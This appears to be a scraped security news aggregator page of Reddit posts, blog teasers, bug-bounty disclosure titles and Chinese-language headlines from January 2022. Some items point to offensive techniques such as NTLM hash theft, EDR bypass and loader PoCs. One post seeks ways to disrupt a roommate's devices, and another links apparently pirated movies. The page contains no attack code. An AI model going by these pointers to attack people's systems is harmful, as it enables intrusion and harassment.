    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480 Points: 2 # Comments: 0
    Same-origin violation vulnerability in Safari 15 could leak a user’s website
    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460 Points: 37 # Comments: 13  ( 4 min )
  • Open

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau [link] [comments]
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
  • Open

    Algorithms for software testing
    submitted by /u/WillyRaezer [link] [comments]
  • Open

    SecWiki News 2022-01-17 Review
    Yasso: 强大的内网渗透辅助工具集 by ourren SecWiki周刊(第411期) by ourren 中国(大陆)虚拟货币犯罪形态分析报告-2021年度 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    ThinkPHP框架渗透实战
    thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞)。  ( 1 min )
    FreeBuf早报 | 沃尔玛低调入局元宇宙;Safari 浏览器漏洞允许跨站点跟踪用户
    沃尔玛将向用户提供虚拟货币和NFT。  ( 1 min )
    国产计算机外设及信创产品安全竞赛,斗象荣获“优秀组织奖”
    斗象荣获2021年“网络安全众测平台”国产计算机外设及信创产品安全竞赛“优秀组织奖”
    冬奥会倒计时!斗象“网安保障军团”使命必达
    斗象科技为数十家央国企单位提供冬奥前的网络安全评估服务与冬奥期间的防守值守服务,全力保障冬奥会核心系统与网络资产的安全。
    《网络安全产业人才岗位能力要求》标准正式发布
    标准正文内容分为六个部分,包括标准的适用范围、规范性引用文件、涉及的术语和定义、主要方向及岗位、能力要素等多个方面。
    知名软件被利用,小心主机被开后门
    攻击者通过网络钓鱼的手段诱导受害者点击运行邮件中附带的木马程序,结合正常的Adobe CEF Helper程序进行攻击。  ( 1 min )
    什么是SSL剥离攻击?
    SSL剥离攻击是一种网络攻击,黑客攻击将Web连接从比较安全的HTTPS降级到不太.安全的HTTP。  ( 1 min )
    欧盟针对一家“虚拟”电力公司进行了网络攻击演习
    欧盟上周对芬兰一家“虚拟”电力公司进行了一次模拟网络攻击演习。
    全国信安标委征求国家标准《信息安全技术 重要数据识别指南》(征求意见稿)发布
    《指南》明确了“重要数据”的定义,是指以电子方式存在的,一旦遭到篡改、破坏、泄露或者非法获取、非法利用,可能危害国家安全、公 共利益的数据。  ( 1 min )
    俄罗斯声称已经捣毁知名勒索软件团伙REvil
    俄罗斯联邦安全局(FSB)宣布已捣毁REvil勒索软件团伙,该团伙是针对大型组织(如Kaseya和JBS USA)的一系列攻击的幕后黑手。
    2022年网络安全趋势:7个趋热,2个趋冷
    2022 年的九大安全趋势,预计在新的一年里攻击的范围和复杂程度将会变得更加难以应对。  ( 1 min )
    聚类算法有哪些?又是如何分类?
    想要了解聚类算法并对其进行区别与比较的话,最好能把聚类的具体算法放到整个聚类分析的语境中理解。  ( 1 min )
    2020及2021年常被利用的30个软件漏洞
    对于所有的0day,定制的恶意软件和其他完全未知的安全漏洞,它们已经存在多年并被广泛利用。  ( 1 min )
  • Open

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    Ejecución dinámica con DInvoke
    Tras varios meses de desarrollo y una vez añadidas las últimas funcionalidades al proyecto, creo que Dinvoke_rs está preparado para que… Continue reading on Medium »  ( 7 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )

  • Open

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MItM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolosh enough to use their fake log in page. Do Coinbase, Binance, etc have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Just completed my Security+.What's should I do next
    Just completed my Security+ and not sure what I should do next.Interested more in Blue team than red team. submitted by /u/Linux98 [link] [comments]  ( 1 min )
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow Facebook guide to intercept Facebook lite android application which uses binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with NoPE Proxy extension which intercept traffic. The enable checkbox can't be checked, even if I launched burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get, port unreachable after I set my phone dns to my machine IP as mentioned in fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic ! submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be Information Security Analyst with bachelor IT degree plus certifications? Can I work in Cyber Security field and be Cyber Security with bachelor IT plus certifications? Can I get into Information Security Analyst and/or Cyber Security field without a degree at all? What certifications you guys recommend? I am thinking doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, experience year, and state? Anyone live in FL and doing Information Security Analyst can give me insight of this job market situation in FL. Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good though? submitted by /u/OlympicAnalEater [link] [comments]  ( 3 min )
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: Https://somepage.com /login.php <--- endpoint But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta [link] [comments]  ( 2 min )
    Do you include CVEs on your resume?
    If you have “accredited” CVEs how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions [link] [comments]  ( 1 min )
  • Open

    You're running untrusted code!
    submitted by /u/nfrankel [link] [comments]  ( 1 min )
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-16 Review
    安全学术会议排行榜(2021版) by ourren Graph Embedding实战系列:Node2vec原理与代码实战 by ourren 初识WebAssembly by ourren 现代网络犯罪模式解读 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Type: HTML injection in confirmation Email !
    Hey Everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty. Continue reading on Medium »  ( 2 min )
    Advanced persistent threat (APT)
    When a system is under attack, Most of people think it as a one-time transfer. when a hacker finds a way to enter into the system, he… Continue reading on Medium »  ( 1 min )
    WTF IS IDOR!?
    One of the most crucial Vulnerabilities listed in top 10 of OWASP is Insecure Direct Object Reference Vulnerability (IDOR Vulnerability)… Continue reading on Medium »  ( 3 min )
    Authentication Bypass -TryHackMe
    Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i was able to see Sensitive Information on One of the India’s best School Website.
    Hello Readers, Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience on how you should start your bug bounty journey. Irrespective of your technical background… Continue reading on Medium »
  • Open

    Dark Web Scraping by OSINT - Scraping & Tools
    ➢ Dark Web Scraping & Tools Continue reading on Medium »  ( 5 min )
    Dark Web Scraping by OSINT - Darknet & TOR
    ➢ History of the Dark Web Continue reading on Medium »  ( 4 min )
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    ➢ What is OSINT? Continue reading on Medium »  ( 2 min )
  • Open

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    I couldn't think of a title so here is a start a long long of music..Feeling sublime? Dont be a tool.I have the cure, If you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    FreeBuf早报 | 未来三年中国网安市场将保持15%以上增速;Linux 恶意软件在 2021 年增长 35%
    中国网络安全产业联盟发布了《中国网络安全产业分析报告(2021年)》,预测未来三年,网络安全市场将保持15%以上的增速,到2023年市场规模将超过800亿元。  ( 1 min )
  • Open

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000
  • Open

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell [link] [comments]
  • Open

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of a contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app and leads to undesirable effects. (One could argue this is a vulnerability in App B by itself but) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69 [link] [comments]  ( 1 min )

  • Open

    How i found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone ! , Hope you all are doing well, I would like to share my “Broken Access Control Through out-of-sync setup” Continue reading on Medium »  ( 6 min )
  • Open

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell [link] [comments]
  • Open

    Need your ideas for my Master's year project
    My project is on Honeypot, so basically what I did till now is, I have deployed T-Pot Honeypot on my machine and started getting attacks on it and my plan is to create firewall against those attacks. I am also thinking to to do a comparison analysis of SIEM tool : ELK and Splunk but not sure I should do it or not. So, I need you to give some more ideas like what else can be done and how should I create firewall? Thanks in advance. submitted by /u/GuireccSS [link] [comments]  ( 1 min )
    Blocking DNS over HTTPS
    basically 443 already headache since cannot decrypt traffic for all of devices but i think DNS over HTTPS is one of the important items. Anything can be done besides manually blocking some known dns providers list? Adding note: Purpose is network security, dont want dns over http on the network. I know not only dns can be passed through 443 but this seems like most important submitted by /u/shodanless [link] [comments]  ( 2 min )
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing…something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that doesn’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills, loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate installing any new hardware is impossible access to the router is impossible buying a 2nd internet connection is impossible The model therefore should be the targets computer, which must be impacted by the actors computer directly, through the router possibly, but without changing any settings on it submitted by /u/JamieOvechkin [link] [comments]  ( 5 min )
    Who do we hire and why?
    Some of the past subjects and replies seems to imply there are alot of questions on what is a qualified cyber security employee. So lets try to help the boys and gurls that want to enter this career and are not sure of what we are looking for. So for all you hiring managers and anyone that was involved in hiring decisions for Cyber Security hires in the past 5 years(Pre and post covid) Please answer the following questions and lets see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ball park salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Auto Motive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…  ( 4 min )
    did 1.1.1.1 is a vpn?
    submitted by /u/Environmental_Camp24 [link] [comments]  ( 1 min )
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example, the Arch Linux installation medium. I see this behavior with factory default Secure Boot keys which likely are MSI's and Microsoft's keys and with my own keys. But keys shouldn't matter since the Arch Linux installation medium isn't signed by anybody: The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot. source I reverted to the version 7B86vAD where Secure Boot works as expected. The last reply from the MSI support was: I: I do not use Windows at all. Support: Generally speaking, the secure boot won't take effect if you system cannot be supported. Please don't worry about it. Thanks! Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal [link] [comments]  ( 1 min )
    Do you allow google docs to your employees on the LAN?
    Hi Folks As we all know Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware so we are blocking them in our corporate LAN. Lately, our organization employees satisfaction department in HR started conducting surveys using Google doc by sharing link with all employees and asked IT department to ensure it is working on all desktops. Is it safe to allow ? I understand there are security risks but a business demand on the other hand that needs to taken care of. Can someone give second thought on this please? Would love to have your valuable inputs submitted by /u/techno_it [link] [comments]  ( 2 min )
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously so I'm currently looking at hiring a vendor to do penetraton testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say, "Kali" unless you can help me with a specific program I can use on that veritable swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2 [link] [comments]  ( 3 min )
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za on my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it so I wanted to finish it by contacting the sites support and ask if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me since I wrote an email around the same time and other useless emails at that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. Current PC has had a clean bill of health so far. Problem is I have done very sensitive stuff on that PC from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this. submitted by /u/WrestleMaykr [link] [comments]  ( 2 min )
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.) Does anyone know of any software that can do this or should I just try to create my own? Thanks in advance submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    Being aggressively targeted how can I make a VM that cannot put anything on my host machine?
    Hello everyone first off I just want to say great community, second of all, I have a question that needs severe attention. Me and my father are being aggressively targeted from malware writers for a reason I don't want to reveal, we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there when this can all be done open source, and with some smart minds. I need to have Windows 10 on my machine for business software unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if thats the best way to do this, if not please say so), or multiple VM's. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself on to my host machine. How exactly is this possible, and what settings do I need to set, what Linux distro should I use, and will I be safe using the business software which is Win10 only on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. ​ Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev [link] [comments]  ( 4 min )
    Issues with GIAC labs?
    I have a buddy who is studying for a giac exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm [link] [comments]  ( 1 min )
    deleted google account
    i am trying to recover data from a deleted google account. i have local law enforcement requesting all data related to the google account. are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast [link] [comments]  ( 1 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis [link] [comments]  ( 1 min )
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM [link] [comments]
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-15 Review
    端到端模型在人员流失预警场景的实践 by ourren 互联网领域黑产常见攻击手法初探 by ourren Zeek - Detect Godzilla WebShell by ourren 云防火墙产品的演进思路 by ourren MSF+生成流量免杀木马 by ourren 剖析海莲花组织恶意文件定制化策略 by ourren r3kapig技能栈1.0 by ourren X通信息安全培训体系建设 by ourren ATT&CK Techniques to Security Events by ourren 更多最新文章,请访问SecWiki
  • Open

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Google Search operators
    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together and explaining the difference between inurl and -inurl? Do I put the file types in brackets, (.mkv|.mp4|.avi|.mov|.mpg|.wmv) like this or does it matter? IE; intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note; commands are in a different order. Does order mater? The above link only explains one command at a time but, apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50 [link] [comments]  ( 1 min )
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl [link] [comments]

  • Open

    Autopsy with wireshark
    Can you import pcap files from wireshark into Autopsy? is there an expansion to do this? submitted by /u/swatteam23 [link] [comments]  ( 1 min )
    Cellebrite 4PC PC requirements
    LE that is just about to become my departments first and sole cellebrite user. We are putting a budget together (cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked and everything looks good except a computer build. We've talked with 2 other cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with cellebrite. I've built a pc before and have a basic knowledge about them, however I don't get these $4k+ build costs when all that's really necessary is an average build with an intell processor and a decent amount of ram. Besides that I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other cellebrite users just getting railroaded by vendors selling them over priced pre-built models or is there something more to the build/requirements. Any advice would be greatly appreciated. submitted by /u/crimsontidepride [link] [comments]  ( 4 min )
    Secure storage identification
    A follow-up to my previous post, can confirm that the premium tools are able to obtain contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use besides relying on the product to tell you? submitted by /u/scrappybytes [link] [comments]  ( 1 min )
  • Open

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm [link] [comments]
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Massive collection of music (mostly not well known artists)
    Update: Ok, i did not know the links redirected to Amazon (As i do not download mp3 files usually) What caught my attention was the bands names that i did not know about submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    In orginization stored xss using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored xss on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436
  • Open

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch [link] [comments]
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
  • Open

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (north Africa) I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what are my chances to find a job abroad. The usual destination for us is France but tbh I'm looking for somewhere else, anywhere in Europe,the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good.The thing is my experience is limited to school projects and 2 internships where I touched on the real world work. I'm not posting my CV unless requested, I'm not here looking for a job (and I don't want to break any rule) but I'm here to ask. Please keep in mind the COVID situation in the world right now which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh [link] [comments]  ( 1 min )
    What tools do you use to audit AD users?
    What tools do you use to audit users on AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx [link] [comments]  ( 2 min )
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering how is the work of application security engineers at meta/fb? Do they write code? or only do code reviews? What are the usual tasks of an engineer in such role? submitted by /u/sapup [link] [comments]  ( 1 min )
    CEO scam solution?
    Problem is: fake CEO or Senior Officials social media profiles are used too scam ("pay this fee to get this job"). - What solutions could monitor web/social media to find such fake profiles or websites? - Would these solutions find this? or is it something into social media/web monitoring? Thank you for the answers submitted by /u/NerdSupremacist [link] [comments]  ( 1 min )
    What's the name of this app that displays your other usernames?
    Few years ago, a friend of mine was travelling in GCC. (Gulf States) His friend showed him an app where he fed my friend's phone number and all his social ids popped up. All the different usernames he has been using, on other social media platforms, going back to several years. The sites that he remembers his id from - Grindr, Manjam, Gaydar, Badoo etc. Does anyone knows what is this thing called? or what is the name of such app? submitted by /u/saffrown [link] [comments]  ( 1 min )
    Newbie with a couple questions about the CEH v11!
    Top of the mornin to ya fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so and I have the following questions. Is 3 months enough of a prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+) Access to the ilabs, The Textbook, Messier's Practice Tests, Messier's Study Guide, O'Reilly's Videos and Messier's v10 videos on Udemy. Will this do for prep material? Question about CEH Practical here. Will the Practical exam be a good first step on a year long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley [link] [comments]  ( 1 min )
    TikTok is hideous...but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant that was aghast I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly [link] [comments]  ( 5 min )
    Salary range for Jr Security Analyst at Bay Area CA
    Hi all, I was wondering what would be the salary range for Junior security analyst position at the Bay Area California? Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie [link] [comments]  ( 2 min )
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains though about 1000. Recently a security research company started running port scans and this is affecting our website health. With some page going down and the CPU usage crossing threshold. Basically we the application is deployed in AKS(k8s) and the backends are behind the Azure Front Door and some subdomains are managed by Global Traffic Manager as well all on Azure. Unfortunately we cannot stop these scans however we have been asked to change our design or solution as the port scanner hit every subdomain at the same point which all of them points to a single host and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much efficient way submitted by /u/SnooGoats8879 [link] [comments]  ( 1 min )
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, prisma cloud and orca security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath [link] [comments]  ( 1 min )
    Taken care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with Lastpass to help them with passwords but is there anything for android that is the equivalent of LogMeIn? Also more of a general question but how do you all care for your parents tech wise? Not sure if I am over stepping my boundaries bud I've already had one family fall prey to a scammer. submitted by /u/OakenRage [link] [comments]  ( 1 min )
  • Open

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva [link] [comments]
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-01-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Alert —Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS Continue reading on Medium »  ( 2 min )
    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… Continue reading on Medium »  ( 8 min )
  • Open

    Honeypot Discussions Part-2
    Honeypot Types Continue reading on Medium »  ( 4 min )
    Powershell Execution Strategy
    What is powershell execution strategy Continue reading on Medium »  ( 6 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    乌克兰警方成功逮捕袭击 50 多家公司的勒索软件团伙
    乌克兰警方逮捕了五名网络犯罪分子,据悉,该团伙使用勒索软件袭击了约50家美国和欧洲企业。  ( 1 min )
    知识大陆Q&A vol.03 | 新大陆的第一步
    正式版上线热门提问合集!  ( 1 min )
    FreeBuf街采 | 2022开年我们找10位路人聊了聊网络安全
    FreeBuf小伙伴在街头对路人进行了随机采访,看看他们的网络安全意识、个人防护意识到底如何。
    Java代码审计 —XSS跨站脚本
    通过分析XSS的产生原因来解决如何防御XSS的问题  ( 4 min )
    FreeBuf周报 | 「网安知识大陆」1.0正式上线;Facebook推出“隐私中心”
    各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    3月2日上海见!CIS 2021 Spring·春日版议题即将公布
    FreeBuf邀请全体网安人于 3 月 2 日至 3 日 在上海宝华万豪酒店 共聚「CIS 2021网络安全创新大会Spring·春日版」。  ( 1 min )
    白宫举办开源安全峰会,众多科技巨头参加
    当地时间1月13日,众多科技巨头公司和联邦机构共聚白宫,就开源软件安全性展开讨论。
    联软科技发布:2022年端点安全十大趋势
    作为中国企业端点安全领域的领导者,联软科技历经19年端点安全实践和行业经验,连续3年持续发布前沿端点安全趋势,旨在为行业提供更多新思路和新参考。  ( 1 min )
    伊朗APT35黑客组织利用Log4j漏洞部署新型PowerShell后门
    研究表示,伊朗APT35组织正在利用Log4Shell漏洞进行攻击并植入一种新型后门。  ( 1 min )
  • Open

